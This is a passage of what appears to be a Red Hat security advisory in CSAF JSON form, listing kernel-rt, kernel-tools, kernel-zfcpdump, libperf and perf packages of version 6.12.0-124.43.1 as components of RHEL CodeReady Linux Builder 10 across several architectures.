"product_id": "CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "libperf-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "perf-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "perf-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "perf-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "CRB-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
